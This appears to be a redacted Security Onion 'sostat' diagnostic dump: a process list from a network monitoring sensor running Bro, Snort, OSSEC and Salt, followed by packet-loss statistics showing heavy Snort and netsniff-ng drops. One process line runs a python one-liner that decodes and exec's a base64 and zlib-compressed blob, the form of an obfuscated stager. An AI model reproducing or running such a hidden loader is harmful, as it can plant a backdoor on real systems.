0.0 0.0 [rcuos/0]
0.0 0.0 [rcuob/0]
0.0 0.0 [ksoftirqd/1]
0.0 0.0 [kworker/1:0H]
0.0 0.0 [rcuos/1]
0.0 0.0 [rcuob/1]
0.0 0.0 [kworker/2:0H]
0.0 0.0 [rcuos/2]
0.0 0.0 [rcuob/2]
0.0 0.0 [kworker/3:0H]
0.0 0.0 [rcuos/3]
0.0 0.0 [rcuob/3]
0.0 0.0 [khelper]
0.0 0.0 [kdevtmpfs]
0.0 0.0 [netns]
0.0 0.0 [perf]
0.0 0.0 [khungtaskd]
0.0 0.0 [writeback]
0.0 0.0 [ksmd]
0.0 0.0 [khugepaged]
0.0 0.0 [crypto]
0.0 0.0 [kintegrityd]
0.0 0.0 [bioset]
0.0 0.0 [kblockd]
0.0 0.0 [ata_sff]
0.0 0.0 [md]
0.0 0.0 [devfreq_wq]
0.0 0.0 [fsnotify_mark]
0.0 0.0 [ecryptfs-kthrea]
0.0 0.0 [kthrotld]
0.0 0.0 [acpi_thermal_pm]
0.0 0.0 [scsi_eh_0]
0.0 0.0 [scsi_tmf_0]
0.0 0.0 [scsi_eh_1]
0.0 0.0 [scsi_tmf_1]
0.0 0.0 [ipv6_addrconf]
0.0 0.0 [deferwq]
0.0 0.0 [charger_manager]
0.0 0.0 [ttm_swap]
0.0 0.0 [kpsmoused]
0.0 0.0 [mpt_poll_0]
0.0 0.0 [scsi_eh_2]
0.0 0.0 [scsi_tmf_2]
0.0 0.0 [scsi_eh_3]
0.0 0.0 [mpt/0]
0.0 0.0 [scsi_tmf_3]
0.0 0.0 [scsi_eh_4]
0.0 0.0 [scsi_tmf_4]
0.0 0.0 [scsi_eh_5]
0.0 0.0 [scsi_tmf_5]
0.0 0.0 [scsi_eh_6]
0.0 0.0 [scsi_tmf_6]
0.0 0.0 [scsi_eh_7]
0.0 0.0 [scsi_tmf_7]
0.0 0.0 [scsi_eh_8]
0.0 0.0 [scsi_tmf_8]
0.0 0.0 [scsi_eh_9]
0.0 0.0 [scsi_tmf_9]
0.0 0.0 [scsi_eh_10]
0.0 0.0 [scsi_tmf_10]
0.0 0.0 [scsi_eh_11]
0.0 0.0 [scsi_tmf_11]
0.0 0.0 [scsi_eh_12]
0.0 0.0 [scsi_tmf_12]
0.0 0.0 [scsi_eh_13]
0.0 0.0 [scsi_tmf_13]
0.0 0.0 [scsi_eh_14]
0.0 0.0 [scsi_tmf_14]
0.0 0.0 [scsi_eh_15]
0.0 0.0 [scsi_tmf_15]
0.0 0.0 [scsi_eh_16]
0.0 0.0 [scsi_tmf_16]
0.0 0.0 [scsi_eh_17]
0.0 0.0 [scsi_tmf_17]
0.0 0.0 [scsi_eh_18]
0.0 0.0 [scsi_tmf_18]
0.0 0.0 [scsi_eh_19]
0.0 0.0 [scsi_tmf_19]
0.0 0.0 [scsi_eh_20]
0.0 0.0 [scsi_tmf_20]
0.0 0.0 [scsi_eh_21]
0.0 0.0 [scsi_tmf_21]
0.0 0.0 [scsi_eh_22]
0.0 0.0 [scsi_tmf_22]
0.0 0.0 [scsi_eh_23]
0.0 0.0 [scsi_tmf_23]
0.0 0.0 [scsi_eh_24]
0.0 0.0 [scsi_tmf_24]
0.0 0.0 [scsi_eh_25]
0.0 0.0 [scsi_tmf_25]
0.0 0.0 [scsi_eh_26]
0.0 0.0 [scsi_tmf_26]
0.0 0.0 [scsi_eh_27]
0.0 0.0 [scsi_tmf_27]
0.0 0.0 [scsi_eh_28]
0.0 0.0 [scsi_tmf_28]
0.0 0.0 [scsi_eh_29]
0.0 0.0 [scsi_tmf_29]
0.0 0.0 [scsi_eh_30]
0.0 0.0 [scsi_tmf_30]
0.0 0.0 [scsi_eh_31]
0.0 0.0 [scsi_tmf_31]
0.0 0.0 [scsi_eh_32]
0.0 0.0 [scsi_tmf_32]
0.0 0.0 [kworker/0:1H]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [kdmflush]
0.0 0.0 [bioset]
0.0 0.0 [bioset]
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 upstart-udev-bridge --daemon
0.0 0.0 /lib/systemd/systemd-udevd --daemon
0.0 0.0 [kmpathd]
0.0 0.0 [kmpath_handlerd]
0.0 0.0 [kworker/3:1H]
0.0 0.0 upstart-socket-bridge --daemon
0.0 0.0 [ext4-rsv-conver]
0.0 0.0 dbus-daemon --system --fork
0.0 0.0 upstart-file-bridge --daemon
0.0 0.0 /lib/systemd/systemd-logind
0.0 0.0 /usr/sbin/bluetoothd
0.0 0.0 avahi-daemon: running [SO-server.local]
0.0 0.0 avahi-daemon: chroot helper
0.0 0.0 [krfcommd]
0.0 0.0 /sbin/getty -8 38400 tty4
0.0 0.0 /sbin/getty -8 38400 tty5
0.0 0.0 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /sbin/getty -8 38400 tty2
0.0 0.0 /sbin/getty -8 38400 tty3
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /sbin/getty -8 38400 tty6
0.0 0.0 /usr/sbin/sshd -D
0.0 0.0 cron
0.0 0.0 su -s /bin/sh -c exec "$0" "$@" sphinxsearch -- /usr/bin/searchd --nodetach
0.0 0.0 [kauditd]
0.0 0.0 /usr/sbin/cups-browsed
0.0 0.0 supervising syslog-ng
0.0 0.0 acpid -c /etc/acpi/events -s /var/run/acpid.socket
0.0 0.0 /usr/sbin/kerneloops
0.0 0.2 /usr/bin/python /usr/bin/salt-minion
0.0 0.0 /var/ossec/bin/ossec-csyslogd
0.0 0.0 /var/ossec/bin/ossec-execd
0.0 0.0 /var/ossec/bin/ossec-analysisd
0.0 0.0 lightdm
0.0 0.0 /var/ossec/bin/ossec-logcollector
0.0 0.0 /usr/lib/accountsservice/accounts-daemon
0.0 0.0 /usr/lib/policykit-1/polkitd --no-debug
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /var/ossec/bin/ossec-monitord
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 [kworker/2:1H]
0.0 0.0 /usr/sbin/cupsd -f
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.0 /usr/lib/upower/upowerd
0.0 0.0 /usr/lib/udisks2/udisksd --no-debug
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 117:126
0.0 1.4 /usr/sbin/apache2 -k start
0.0 0.0 /sbin/getty -8 38400 tty1
0.0 0.0 [kworker/1:1H]
0.0 0.0 su - SO-user -- /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 su - SO-user -- /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.1 tclsh /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.0 tail -n 0 -F /var/ossec/logs/alerts/alerts.log
0.0 0.0 su - SO-user -- /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 tclsh /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 su - SO-user -- /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.0 0.0 tail -n 1 -f /nsm/sensor_data/SO-server-eth1/snort-1.stats
0.0 0.0 [kworker/0:0]
0.0 0.0 sshd: SO-user [priv]
0.0 0.0 sshd: SO-user@pts/4
0.0 0.0 -bash
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.0 0.0 lightdm --session-child 12 21
0.0 0.0 /usr/bin/gnome-keyring-daemon --daemonize --login
0.0 0.0 init --user
0.0 0.0 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-yHYdmVL9u1
0.0 0.0 upstart-event-bridge
0.0 0.0 upstart-file-bridge --daemon --user
0.0 0.0 upstart-dbus-bridge --daemon --session --user --bus-name session
0.0 0.0 upstart-dbus-bridge --daemon --system --user --bus-name system
0.0 0.0 /usr/lib/at-spi2-core/at-spi-bus-launcher
0.0 0.0 /bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3
0.0 0.0 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
0.0 0.0 /usr/lib/gvfs/gvfsd
0.0 0.0 /usr/lib/gvfs/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes
0.0 0.0 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
0.0 0.0 xfce4-session
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.1 xfwm4
0.0 0.1 xfce4-panel
0.0 0.3 Thunar --daemon
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
0.0 0.0 light-locker
0.0 0.0 xfce4-power-manager
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
0.0 0.0 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
0.0 0.1 update-notifier
0.0 0.2 /usr/bin/python /usr/bin/blueman-applet
0.0 0.1 nm-applet
0.0 0.2 /usr/bin/python /usr/share/system-config-printer/applet.py
0.0 0.0 xfce4-volumed
0.0 0.1 xfsettingsd
0.0 0.0 /usr/bin/pulseaudio --start --log-target=syslog
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 16777249 systray Notification Area Area where notification icons appear
0.0 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libindicator-plugin.so 5 16777250 indicator Indicator Plugin Provides a panel area for Unity indicators. Indicators allow applications and system services to display their status and interact with the user.
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2
0.0 0.0 /usr/lib/gvfs/gvfs-udisks2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-mtp-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-afc-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0
0.0 0.0 /usr/bin/obex-data-server --no-daemon
0.0 0.2 chromium-browser --type=zygote
0.0 0.1 chromium-browser --type=zygote
0.0 0.0 [kworker/3:0]
0.0 0.0 [kworker/1:4]
0.0 0.1 /usr/lib/x86_64-linux-gnu/tumbler-1/tumblerd
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 0.0 sudo sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat
0.0 0.0 sed -r s/(\b[0-9]{1,3}\.){3}[0-9]{1,3}\b/X.X.X.X/g
0.0 0.0 sed -r s/([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}/MM:MM:MM:MM:MM:MM/g
0.0 0.0 sed -r s/(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))\b/X.X.X.X/g
0.0 0.0 sed -r s/X:ssh_port/X:ssh_port/g
0.0 0.0 sed -r s/\*:ssh_port/*:ssh_port/g
0.0 0.0 sed -r s/SO-server/SO-server/g
0.0 0.0 sed -r s/SO-node/SO-node/g
0.0 0.0 sed -r s/SO-user|SO-user/SO-user/g
0.0 0.0 [kworker/0:1]
0.0 0.0 CRON
0.0 0.0 CRON
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh > /dev/null 2>&1
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh
0.0 0.0 /bin/sh -c /usr/sbin/so-bro-cron >> /var/log/nsm/so-bro-cron.log 2>&1
0.0 0.0 /bin/bash /usr/sbin/so-bro-cron
0.0 0.0 su SO-user -c /opt/bro/bin/broctl cron
0.0 0.0 sh
0.0 0.0 /usr/bin/python -c import zlib,base64; exec(zlib.decompress(base64.b64decode(b"eJxlU01v2zAMPUe/QvClEqYZTbCTAR1z6GFYD93JMwLXplsVtmRI9pyg6H8fKcVrmhz8IfLxkXwimRlG5yfuggonfObn0bsGAv6aF1v3KkAPzaTegrPs6eHn/tfvJ73d3TPWQscXEWTBNhiZh6l185Qv3kwgPIweXfwbz/7YTH5BdP0cXoVMBHCE5tAMbRD0Iq5RlxXbdM5zo9DGjeVg5wF8jbwraDP5E302VKz+LDp/dCNYgqmU7Yvv4XFPZvD+2sxlJMvrEcNbIYwiryQrHBsYJ76PH+MsrwOHmHshnNiquztk9QKkpAAP0+wtHxlbROahbk/Yf+OGobZtoN6Srnnd134QZ0Ulo4Z7Y4H6RQVRvaSYsTmRkEtlrbNAemL6lXEtme4n712NShIWK2HUQtAXCp9DsJyhPQz1qN8/WHfxF3SASaRakgJUTaTBjE6/Z6Y9ZoVRPCNjVtAbD0nqrCirdECBz4elNpOxL1mx+8A7jalKCjrPQqVduUZXNwCkWQHEiIBz3VcUt/YUSYQhn8eWJkdcxKgLHAm1vJoeOIKxS68O6qDT0OfpI9CjsJ2ykmkwuziVnoYA2UacMhfiLSEy75DLOiHV9n73gwbIdDyh4tCce+zaar255IwD2DiLcs3A8IA96bUvRLNN7MbD4P4C5pEJUv6XuPqutynbV3NxTRxXJmLiJRJzmOppDjrKQoFCptb0c5blb87Ejfq8qbgWuEQ33nhN5MXViDaal0qJxK9I+ii5jMtB04y78Q9tonhI")))
0.0 0.0 ps -eo pcpu,pmem,args --sort -pcpu
=========================================================================
Packets received during last monitoring interval (600 seconds)
=========================================================================
eth1: 4979407
=========================================================================
Packet Loss Stats
=========================================================================
NIC:
eth1:
RX packets:56353787 dropped:0 TX packets:0 dropped:0
-------------------------------------------------------------------------
pf_ring:
Appl. Name : bro-eth1
Tot Packets : 34675530
Tot Pkt Lost : 62159
Appl. Name : snort-cluster-52-socket-0
Tot Packets : 34525973
Tot Pkt Lost : 21603700
-------------------------------------------------------------------------
IDS Engine (snort) packet drops:
/nsm/sensor_data/SO-server-eth1/snort-1.stats last reported pkt_drop_percent as 59.982
-------------------------------------------------------------------------
-------------------------------------------------------------------------
Netsniff-NG:
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +281087 Lost: -84828
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153675 Lost: -52729
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154609 Lost: -29468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +141898 Lost: -67497
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149275 Lost: -50137
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152901 Lost: -87428
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163313 Lost: -52650
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152639 Lost: -8930
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157847 Lost: -77388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151968 Lost: -55856
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +204140 Lost: -57843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152290 Lost: -58986
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171016 Lost: -115309
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153623 Lost: -44488
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166983 Lost: -127872
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150231 Lost: -101962
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155714 Lost: -97126
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +144220 Lost: -78622
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158514 Lost: -23123
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156996 Lost: -130088
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157654 Lost: -67854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157060 Lost: -88992
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151666 Lost: -152145
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154369 Lost: -219589
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150539 Lost: -67751
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162345 Lost: -105355
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154327 Lost: -167312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155661 Lost: -75838
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163706 Lost: -50332
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158259 Lost: -32470
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156628 Lost: -89305
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159619 Lost: -89893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154935 Lost: -32824
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +161616 Lost: -150161
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150788 Lost: -80130
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153007 Lost: -191410
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156020 Lost: -153183
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154653 Lost: -21881
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +168716 Lost: -88843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155129 Lost: -155794
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154156 Lost: -21525
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +170767 Lost: -282004
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152312 Lost: -156235
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151800 Lost: -323131
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156651 Lost: -69671
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159133 Lost: -111679
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153811 Lost: -157958
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152442 Lost: -68448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154479 Lost: -367559
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153201 Lost: -146661
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154612 Lost: -284389
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151621 Lost: -98944
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156913 Lost: -401066
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160220 Lost: -196947
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150948 Lost: -194220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158654 Lost: -170584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154511 Lost: -4798
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171438 Lost: -49109
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152965 Lost: -94511
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154415 Lost: -158397
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150472 Lost: -87014
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +181953 Lost: -319597
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155490 Lost: -54181
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154236 Lost: -214645
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154378 Lost: -190112
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154606 Lost: -147184
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154932 Lost: -56900
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149442 Lost: -56543
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156239 Lost: -207813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162749 Lost: -120312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153262 Lost: -43779
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152895 Lost: -124177
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157192 Lost: -78728
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155885 Lost: -99228
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154574 Lost: -97527
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149461 Lost: -40833
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158258 Lost: -67950
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151817 Lost: -53498
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151833 Lost: -65108
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150379 Lost: -56513
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163113 Lost: -128011
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +164900 Lost: -52247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155976 Lost: -240717
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155348 Lost: -146285
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155486 Lost: -183885
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154410 Lost: -112444
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152535 Lost: -137474
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153837 Lost: -8714
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158562 Lost: -91344
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155802 Lost: -138584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153267 Lost: -169563
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150112 Lost: -120893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165912 Lost: -190196
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158494 Lost: -14316
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162094 Lost: -82767
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153381 Lost: -253637
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158809 Lost: -140933
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158387 Lost: -103296
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165453 Lost: -218529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150309 Lost: -249883
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153836 Lost: -26062
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157252 Lost: -171448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155483 Lost: -270732
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154217 Lost: -197405
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154570 Lost: -303347
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152260 Lost: -182846
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154920 Lost: -153915
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155554 Lost: -176945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157189 Lost: -124202
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159435 Lost: -196643
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156949 Lost: -26469
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160441 Lost: -116791
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156311 Lost: -41854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166929 Lost: -215139
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157383 Lost: -239468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152067 Lost: -30521
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151948 Lost: -47211
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157341 Lost: -238247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157204 Lost: -146132
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150749 Lost: -157308
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152474 Lost: -204891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +225581 Lost: -29388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +154392 Lost: -12750
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +244863 Lost: -18107
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156780 Lost: -49606
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152666 Lost: -115945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +165067 Lost: -10979
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +203398 Lost: -82552
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +145210 Lost: -31184
